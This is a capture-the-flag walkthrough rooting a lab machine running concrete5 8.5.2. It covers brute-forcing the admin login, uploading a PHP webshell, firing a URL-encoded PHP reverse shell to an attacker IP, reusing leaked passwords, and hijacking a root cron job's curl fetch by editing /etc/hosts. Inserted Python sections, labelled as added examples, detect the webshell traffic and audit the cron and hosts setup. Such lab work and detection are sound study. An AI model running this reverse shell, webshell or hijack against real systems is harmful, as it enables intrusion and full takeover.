Target IP: 10.10.195.160
Challenge Description: Try to root the machine!
To begin the challenge, I performed a TCP port scan against the target machine using the command sudo nmap -sS 10.10.195.160 -p- and obtained the result shown above. By the looks of it, there is only one TCP port open on the target machine: port 85.
I performed an aggressive TCP port scan using the command sudo nmap -sV -A 10.10.195.160 -p 85 and obtained the result shown above. By the looks of it, the target machine seems to be running HTTP on port 85. I performed a subdomain enumeration but I did not find anything useful. Time to enumerate this port further.
Port 85: HTTP
I performed a scan against the web server on port 85 using the command nikto -h http://10.10.195.160:85 and obtained the result shown above. The scan successfully identified the interesting result shown above. There is an interesting directory with the name /app. Time to perform a directory search to identify any other useful directories.
Running a directory search using the command gobuster dir -u http://10.10.195.160:85 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt also successfully identified the /app directory.
Browsing to http://10.10.195.160:85/ returns the webpage shown above. Scanning the source code of the webpage did not result in anything useful either. Time to visit the /app directory now.
Browsing to the /app directory returns the webpage shown above. This webpage has one button with the text JUMP.
<button onclick="buttonClick()">JUMP</button>
<script>
function buttonClick() {
    alert("Make yourself confortable and enjoy my place.");
    window.location.href = 'castle';
}
</script>
Viewing the source code of the /app webpage shows the script above. Pressing the JUMP button executes this script, which seems to redirect to /castle.
I pressed the button from the previous image and the webpage above was returned to me. After some manual enumeration, I found possible usernames such as toad, toadette, etc.
Viewing the source code of the webpage, I managed to obtain the application name and version concrete5 - 8.5.2 as shown above. Is the web application vulnerable? Time to find out.
I did a Google search for concrete5 8.5.2 vulnerabilities and found the webpage shown above. This application version is vulnerable to RCE by the looks of it. However, I will require admin privileges to perform RCE. This website also contains the steps on how to compromise this web application after obtaining admin access. Maybe I can reproduce the steps after gaining admin credentials?
I found the login webpage. However, I sprayed default credentials such as admin:admin and admin:root, but I had no luck. Time to brute-force the login. I fired up Burp Suite on my machine and intercepted a login request.
I tried to brute-force the password of the user admin and got a hit using the Intruder tool and its sniper attack. The only change I made is to the password field. I used the password file 10-million-password-list-top-1000.txt. And I successfully obtained the credentials admin:password, as shown above.
And bingo! Now I have admin access on the web application using the credentials admin:password. Now I can use the website I found earlier and follow the steps to upload a reverse shell.
Owning the Web Application: Webshell Upload via File Upload Attack
The steps to reproduce to gain an RCE on the target machine are shown above.
I inserted php inside the Allow File Types list, as shown above.
On my machine, I created a simple PHP webshell with the name shell.php. The content of this PHP webshell is shown above. Time to upload my PHP webshell using the File Manager on the target machine now.
I uploaded my PHP webshell as shown above. However, I will need to find the location of this script so I can perform RCE. I right-clicked on the shell.php file and then selected Properties.
Foothold: RCE via Webshell & Reverse Shell Connection
I noticed my webshell is being served at http://10.10.195.160:85/app/castle/application/files/2817/1857/1519/shell.php. Time to visit this URL to perform RCE. And perfect! Now I can perform RCE. I managed to successfully execute the commands ls;whoami;id and obtained the result shown above. Time to obtain a reverse shell connection now. I started a listener on my machine at port 8443 first.
Then using my PHP webshell, I deployed the reverse shell command php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fsh%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27 and obtained a reverse shell connection at port 8443. The full URL with the reverse shell payload is http://10.10.195.160:85/app/castle/application/files/2817/1857/1519/shell.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fsh%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27. Now I have a foothold on the target machine as the user www-data. Time to elevate my privileges to obtain a root shell :)
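From the defender's side, the activity in this section leaves a clear trail in the web server access log: PHP being served from the concrete5 upload directory, and a cmd= parameter carrying URL-encoded shell commands. The following detection logic is an added example, not part of the original writeup; the log lines and the IP addresses in them are constructed samples.

```python
# Added example, not from the original writeup: detection logic for the
# webshell activity described above, run over constructed access-log lines.
import re
from urllib.parse import urlsplit, unquote

# Apache/nginx combined-log prefix: client, ident, user, [time] "METHOD target proto" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) \S+" (\d{3})')
# concrete5 stores uploads under application/files/; a .php file served from
# there is the primary indicator (the upload allowlist had php added to it).
UPLOAD_PHP_RE = re.compile(r"/application/files/.*\.php$", re.IGNORECASE)
# Strings a cmd= parameter should never carry (compared after URL-decoding).
CMD_INDICATORS = ("fsockopen", "php -r", "/bin/sh", "bash -i", "whoami", ";id")

def analyze_request(line):
    """Return indicator labels for one log line; an empty list means clean."""
    m = LOG_RE.match(line)
    if not m:
        return []
    _client, _method, target, _status = m.groups()
    url = urlsplit(target)
    findings = []
    if UPLOAD_PHP_RE.search(url.path):
        findings.append("php-in-upload-dir")
    # Decode twice: the payload above is encoded once, but double encoding
    # is a common way of slipping past naive single-pass filters.
    decoded = unquote(unquote(url.query)).lower()
    hits = [ind for ind in CMD_INDICATORS if ind in decoded]
    if hits:
        findings.append("cmd-exec:" + ",".join(hits))
    return findings

def scan_log(lines):
    """Map line index -> findings for every suspicious line."""
    results = {}
    for i, line in enumerate(lines):
        findings = analyze_request(line)
        if findings:
            results[i] = findings
    return results

# Constructed sample log (the attacker IP and paths mirror the writeup).
SAMPLE_LOG = [
    '10.14.55.153 - - [01/Jan/2024:12:00:00 +0000] "GET /app/castle/application/files/2817/1857/1519/shell.php?cmd=ls;whoami;id HTTP/1.1" 200 512',
    '10.14.55.153 - - [01/Jan/2024:12:00:05 +0000] "GET /app/castle/application/files/2817/1857/1519/shell.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3B%27 HTTP/1.1" 200 0',
    '10.14.55.200 - - [01/Jan/2024:12:01:00 +0000] "GET /app/castle/application/files/1234/5678/9012/logo.png HTTP/1.1" 200 2048',
    '10.14.55.200 - - [01/Jan/2024:12:01:03 +0000] "GET /app/castle/index.php?cID=1 HTTP/1.1" 200 8192',
]
```

Beyond log review, the root cause here is the allowlist change: php should never be an accepted upload type on a CMS, and the upload directory should be served with script execution disabled.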
Horizontal Privilege Escalation: www-data to Mario
On the target machine, I noticed there are two users: toad and mario. After some manual enumeration, I found an interesting file called database.php which contains the password toadisthebest. This password seems to belong to the user toad too. Can I switch user using this new password?
And bingo! I ran the command su toad with the password toadisthebest and got a hit. I managed to successfully elevate my privileges to the user toad from www-data, as shown above.
Running the command env to list all environment variables revealed an interesting entry with the name PWD_token and the value aWthVGVOVEFOdEVTCg==, as shown above. I can use CyberChef to decode this. After decoding it, I obtained the string ikaTeNTANtES. Does this password belong to the user mario? Time to find out.
And bingo! The password belongs to the user mario, as shown above. I was able to successfully switch to this user.
Vertical Privilege Escalation: Mario to Root via Domain Hijacking & Cronjob Execution
I transferred pspy64 to the target machine and executed it. After waiting for some time, I obtained the interesting output shown above. The command /bin/sh -c curl mkingdom.thm:85/app/castle/application/counter.sh looks the most interesting to me, as it seems to be executing the script counter.sh located at /app/castle/application/ on the domain name mkingdom.thm:85. The attack vector I can use is domain hijacking. This is possible by editing /etc/hosts to point the domain at my machine and then creating and serving a malicious reverse shell script named counter.sh under /app/castle/application/ on my machine on port 85.
On my machine, I created the same directory and the malicious script with the name counter.sh as shown above. Then I started a Python HTTP server at port 85 by using the command python3 -m http.server 85. Time to edit the /etc/hosts file on the target machine and insert my machine's IP address for the domain name mkingdom.thm.
I made changes as shown above to the /etc/hosts file using nano on the target machine. The entry above contains my IP address for the domain name mkingdom.thm. Then I started a listener on my machine at port 8444.
And bingo. I waited for some time, and then I obtained a root shell on port 8444, as shown above.
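Two misconfigurations combine in this escalation: a root cron job that fetches a script over plain HTTP with no integrity check, and an /etc/hosts file that the low-privileged user can edit. The audit below is an added example, not part of the original writeup; the cron entry mirrors the pspy output, while the /etc/hosts contents before and after the edit are constructed (the writeup does not show the original entry).

```python
# Added example, not part of the original writeup: audits the two conditions
# the root escalation above depends on, a privileged cron job fetching a
# script over plain HTTP and an /etc/hosts entry redirecting that hostname.
# All inputs below are constructed samples.
import re

# curl/wget of a *.sh URL; group 1 = hostname, group 2 = script path.
FETCH_RE = re.compile(
    r"\b(?:curl|wget)\b.*?(?:https?://)?([a-z0-9][a-z0-9.-]*\.[a-z]{2,})(?::\d+)?(/\S*\.sh)\b",
    re.IGNORECASE,
)

def parse_hosts(text):
    """Map every hostname in /etc/hosts content to the address it resolves to."""
    mapping = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        for name in names:
            mapping[name.lower()] = ip
    return mapping

def audit(cron_lines, hosts_text, trusted_ips):
    """Return human-readable findings for cron entries that fetch remote scripts."""
    hosts = parse_hosts(hosts_text)
    findings = []
    for entry in cron_lines:
        m = FETCH_RE.search(entry)
        if not m:
            continue
        host, path = m.group(1).lower(), m.group(2)
        if "https://" not in entry.lower():
            findings.append(f"cron fetches {path} from {host} over plain http")
        ip = hosts.get(host)
        # A local override pointing a fetched-from hostname anywhere unexpected
        # is exactly what lets a user with write access to /etc/hosts hijack it.
        if ip is not None and ip not in trusted_ips:
            findings.append(f"/etc/hosts maps {host} to {ip}, not a trusted address")
    return findings

# Constructed: the job pspy revealed, and /etc/hosts before/after the edit.
CRON = ["* * * * * root /bin/sh -c curl mkingdom.thm:85/app/castle/application/counter.sh"]
HOSTS_CLEAN = "127.0.0.1 localhost\n127.0.1.1 mkingdom.thm\n"
HOSTS_HIJACKED = "127.0.0.1 localhost\n10.14.55.153 mkingdom.thm  # attacker-controlled\n"
TRUSTED = {"127.0.0.1", "127.0.1.1"}
```

The durable fix is to stop root from executing freshly downloaded content at all (run a local copy of counter.sh) and to keep /etc/hosts writable only by root.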
The two flags are shown above. I had to read the flags using the tail command, as cat did not work. GG.